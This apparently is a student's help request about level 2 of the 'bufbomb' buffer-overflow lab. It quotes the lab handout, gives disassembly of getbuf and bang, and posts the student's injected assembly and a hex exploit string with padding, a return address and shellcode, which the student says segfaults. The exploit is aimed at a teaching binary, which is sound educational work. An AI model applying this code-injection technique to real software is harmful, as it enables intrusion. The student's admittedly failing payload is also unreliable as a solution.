A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine in- structions. The exploit string then overwrites the return pointer with the starting address of these instructions on the stack. When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code. Within the file bufbomb there is a function bang having the following C code: int global_value = 0; void bang(int val) { if (global_value == cookie) { printf("Bang!: You set global_value to 0x%x ", global_value); validate(2); } else printf("Misfire: global_value = 0x%x ", global_value); exit(0); } 7 Similar to Levels 0 and 1, your task is to get BUFBOMB to execute the code for bang rather than returning to test. Before this, however, you must set global variableglobal_valueto your userids cookie. Your exploit code should set global_value, push the address of bang on the stack, and then execute a ret instruction to cause a jump to the code for bang

My dump code for getbuf and bang are 0x804926e push %ebp 0x804926f mov %esp,%ebp 0x8049271 push %ebx 0x8049272 sub $0x24,%esp 0x8049275 call 0x8049266 <__x86.get_pc_thunk.ax> 0x804927a add $0xc2d86,%eax 0x804927f sub $0xc,%esp 0x8049282 lea -0x28(%ebp),%edx 0x8049285 push %edx 0x8049286 mov %eax,%ebx 0x8049288 call 0x8048c64 0x804928d add $0x10,%esp 0x8049290 mov $0x1,%eax 0x8049295 mov -0x4(%ebp),%ebx 0x8049298 leave 0x8049299 ret

and for bang ///////////////////////////////////////////////// 0x08048a02 <+0>: push %ebp 0x08048a03 <+1>: mov %esp,%ebp 0x08048a05 <+3>: push %ebx 0x08048a06 <+4>: sub $0x4,%esp 0x08048a09 <+7>: call 0x8048840 <__x86.get_pc_thunk.bx> 0x08048a0e <+12>: add $0xc35f2,%ebx 0x08048a14 <+18>: mov 0x24d4(%ebx),%eax 0x08048a1a <+24>: mov %eax,%edx 0x08048a1c <+26>: mov 0x24cc(%ebx),%eax 0x08048a22 <+32>: cmp %eax,%edx 0x08048a24 <+34>: jne 0x8048a4e 0x08048a26 <+36>: mov 0x24d4(%ebx),%eax 0x08048a2c <+42>: sub $0x8,%esp 0x08048a2f <+45>: push %eax 0x08048a30 <+46>: lea -0x36ddc(%ebx),%eax 0x08048a36 <+52>: push %eax 0x08048a37 <+53>: call 0x8051d70 0x08048a3c <+58>: add $0x10,%esp 0x08048a3f <+61>: sub $0xc,%esp 0x08048a42 <+64>: push $0x2 0x08048a44 <+66>: call 0x8049463 0x08048a49 <+71>: add $0x10,%esp 0x08048a4c <+74>: jmp 0x8048a67 0x08048a4e <+76>: mov 0x24d4(%ebx),%eax 0x08048a54 <+82>: sub $0x8,%esp 0x08048a57 <+85>: push %eax 0x08048a58 <+86>: lea -0x36db7(%ebx),%eax 0x08048a5e <+92>: push %eax 0x08048a5f <+93>: call 0x8051d70 0x08048a64 <+98>: add $0x10,%esp 0x08048a67 <+101>: sub $0xc,%esp 0x08048a6a <+104>: push $0x0 0x08048a6c <+106>: call 0x8050d00 What I know is that my bang address is 0x08048a02, my global value is 0x810e4d, my stack address is 0x556833a8 before calling bang, and my cookie address is 0x7445bfb8. What I have for my assembly file is movl $0x7445bfb8, 0x810e4d4 push $0x08048a02 ret and I am using 44 bits of padding but I get a segmentation error. I am not sure if my assembly file is wrong and/ or if I have the wrong amount of padding (input file that gives error below) 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 a8 33 68 55 c7 05 d4 e4 10 08 b8 bf 45 74 68 02 8a 04 08 c3